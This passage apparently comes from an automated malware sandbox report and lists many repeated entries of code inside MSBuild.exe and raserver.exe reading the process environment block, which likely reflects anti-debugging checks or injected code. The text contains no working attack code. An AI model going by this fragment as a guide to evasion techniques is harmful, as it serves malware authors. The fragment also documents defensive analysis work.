          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01511DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01511DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01511DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0157C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0157C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014FEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014FFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0157FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0157FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01567794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01567794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01567794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01518E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0159FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01528EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0159FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0157FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047F746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04856CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04856CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04856CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04856C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04856C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04856C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04856C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0480BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0480A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0486C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0486C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04802581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04802581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04802581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04802581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0480FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0480FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047F7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04801DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04801DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04801DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04856DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04856DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04856DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04856DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04856DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04856DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047DAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0489FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0489FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0489FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0489FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04888DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0489E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0485A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04804D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04804D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04804D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04813D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04853540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04883D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047D2D8A mov eax, dword ptr fs:[00000030h]
